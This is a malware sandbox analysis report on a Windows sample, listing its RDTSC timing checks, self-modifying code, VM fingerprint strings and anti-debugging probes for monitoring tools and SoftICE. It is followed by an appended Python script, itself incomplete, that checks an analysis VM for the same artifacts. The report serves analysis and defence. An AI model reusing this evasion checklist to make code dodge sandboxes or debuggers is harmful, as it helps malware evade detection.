Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D7F83 second address: 7D7F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D7F8F second address: 7D7F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D80D6 second address: 7D80F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FCA94C93E43h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D80F4 second address: 7D80FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E5DC2 second address: 7E5DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7E5DCF second address: 7E5DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7EEB54 second address: 7EEB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7ED39E second address: 7ED3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618470h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7ED3B2 second address: 7ED3F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E48h 0x00000007 jmp 00007FCA94C93E48h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FCA94C93E42h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7ED57D second address: 7ED58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCA94618466h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7ED58C second address: 7ED590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7ED590 second address: 7ED59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FCA94618466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7ED59C second address: 7ED5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7ED9E3 second address: 7ED9ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7EDB39 second address: 7EDB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7EDCDD second address: 7EDCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7EDCE2 second address: 7EDD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E49h 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E42h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7EDD19 second address: 7EDD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7EDD1F second address: 7EDD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7F2303 second address: 7F2307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FEC04 second address: 7FEC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E41h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FEC26 second address: 7FEC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FB353 second address: 7FB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7FB357 second address: 7FB376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80C98A second address: 80C99E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FCA94C93E36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80C99E second address: 80C9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007FCA9461846Ch 0x0000000f je 00007FCA94618466h 0x00000015 pushad 0x00000016 jmp 00007FCA94618479h 0x0000001b jnp 00007FCA94618466h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80C9D7 second address: 80C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80C9E2 second address: 80C9EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80C9EF second address: 80C9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81C5C7 second address: 81C5D3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94618466h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81B4E2 second address: 81B539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FCA94C93E3Dh 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E45h 0x00000012 jnc 00007FCA94C93E36h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jp 00007FCA94C93E4Ch 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FCA94C93E44h 0x00000028 jo 00007FCA94C93E3Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81B96F second address: 81B975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81BDAB second address: 81BDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E48h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81BDC7 second address: 81BDD1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81BDD1 second address: 81BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81BF62 second address: 81BF68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81BF68 second address: 81BF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FCA94C93E36h 0x00000012 popad 0x00000013 jmp 00007FCA94C93E44h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81BF8F second address: 81BFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA94618478h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 81C2A6 second address: 81C2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8206B9 second address: 8206BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8206BD second address: 8206C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8206C3 second address: 8206C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 820998 second address: 82099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82099C second address: 8209DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618477h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 820A8A second address: 820A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 820CED second address: 820CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 820CF1 second address: 820D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E3Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FCA94C93E3Eh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push esi 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8237AD second address: 8237B3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8237B3 second address: 8237B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8237B8 second address: 8237BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8237BE second address: 8237C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F60299 second address: 4F60312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCA94618470h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FCA94618471h 0x00000017 or cl, 00000006h 0x0000001a jmp 00007FCA94618471h 0x0000001f popfd 0x00000020 call 00007FCA94618470h 0x00000025 mov dl, cl 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FCA94618474h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F60312 second address: 4F60318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F60318 second address: 4F60338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCA94618471h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60338 second address: 4F60359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 9Dh 0x00000005 mov eax, 7AF13A5Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f call 00007FCA94C93E40h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5A1A9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 745B04 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7C6992 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A754D rdtsc 0_2_005A754D
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003538B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00354910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0034DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0034E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0034ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00354570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0034DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0034BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0034F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00353EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003416D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00341160 GetSystemInfo,ExitProcess,0_2_00341160
                Source: file.exe, file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWM
                Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareH
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13250
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13253
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13272
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13264
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13304
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A754D rdtsc 0_2_005A754D
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003445C0 VirtualProtect ?,00000004,00000100,00000000 0_2_003445C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00359860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00359750 mov eax, dword ptr fs:[00000030h] 0_2_00359750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00357850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
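                The window names, SoftICE device names and registry values in the Anti Debugging and evasion signatures above double as a checklist for hardening an analysis VM. The script below is an added example; it is not part of the Joe Sandbox report and not the sample's code. Run on an analysis box, it probes the same artifacts the sample probes and reports which of them would give the environment away. The VM_MARKERS substrings are an assumption of this example: the report only shows that the BIOS and display-driver values are read and that VMware and Hyper-V strings appear in the process memory. Off Windows the probe returns nothing and only the decision logic runs.

```python
"""Which of the analysis-environment artifacts this sample probes does your VM expose?

Added example; not code from the report or from the sample. The window
names, device names and registry values come from the Anti Debugging and
evasion signatures in the report. VM_MARKERS (substrings treated as
hypervisor fingerprints in BIOS/driver strings) is an assumption.
"""
import sys

# Window titles / class names the sample opens (from the report).
WINDOW_NAMES = [
    "regmonclass",
    "gbdyllo",
    "process monitor - sysinternals: www.sysinternals.com",
    "procmon_window_class",
    "registry monitor - sysinternals: www.sysinternals.com",
    "ollydbg",
    "filemonclass",
    "file monitor - sysinternals: www.sysinternals.com",
]
# Kernel device names the sample opens (SoftICE and its video driver).
DEVICE_NAMES = ["NTICE", "SICE", "SIWVID"]
# HKLM values the sample reads: (subkey, value name).
REGISTRY_CHECKS = [
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
]
# ACPI table key that exists only under VirtualBox (string found in the sample's memory).
VBOX_ACPI_KEY = r"HARDWARE\ACPI\DSDT\VBOX__"
# Assumed hypervisor markers; the report shows "VMware" and "Hyper-V" strings in memory.
VM_MARKERS = ("vbox", "virtualbox", "vmware", "qemu", "hyper-v", "virtual", "innotek", "bochs")


def classify(windows_found, devices_found, registry_values, vbox_key_exists):
    """Pure decision logic, so it can be exercised on any OS.

    registry_values maps (subkey, value name) -> string, or None if absent.
    Returns one line per artifact that would reveal the analysis environment.
    """
    findings = [f"window present: {w}" for w in windows_found]
    findings += [f"device openable: \\\\.\\{d}" for d in devices_found]
    for (subkey, name), value in registry_values.items():
        if value and any(marker in value.lower() for marker in VM_MARKERS):
            findings.append(f"registry HKLM\\{subkey}\\{name} = {value!r}")
    if vbox_key_exists:
        findings.append(f"registry key exists: HKLM\\{VBOX_ACPI_KEY}")
    return findings


def probe():
    """Run the same checks the sample runs. Returns empty results off Windows."""
    if sys.platform != "win32":
        return [], [], {}, False
    import ctypes
    import winreg

    user32, kernel32 = ctypes.windll.user32, ctypes.windll.kernel32
    user32.FindWindowA.restype = ctypes.c_void_p
    kernel32.CreateFileA.restype = ctypes.c_void_p
    kernel32.CreateFileA.argtypes = [ctypes.c_char_p, ctypes.c_uint32, ctypes.c_uint32,
                                     ctypes.c_void_p, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p]
    kernel32.CloseHandle.argtypes = [ctypes.c_void_p]
    invalid_handle = ctypes.c_void_p(-1).value

    # FindWindowA(class, title): the report says title or class, so try both.
    windows = [w for w in WINDOW_NAMES
               if user32.FindWindowA(w.encode(), None) or user32.FindWindowA(None, w.encode())]

    devices = []
    for d in DEVICE_NAMES:  # OPEN_EXISTING == 3; success means the driver is loaded
        h = kernel32.CreateFileA(f"\\\\.\\{d}".encode(), 0, 0, None, 3, 0, None)
        if h != invalid_handle:
            kernel32.CloseHandle(h)
            devices.append(d)

    values = {}
    for subkey, name in REGISTRY_CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as k:
                data = winreg.QueryValueEx(k, name)[0]  # REG_MULTI_SZ comes back as a list
                values[(subkey, name)] = " ".join(data) if isinstance(data, list) else str(data)
        except OSError:
            values[(subkey, name)] = None

    try:
        winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, VBOX_ACPI_KEY))
        vbox = True
    except OSError:
        vbox = False
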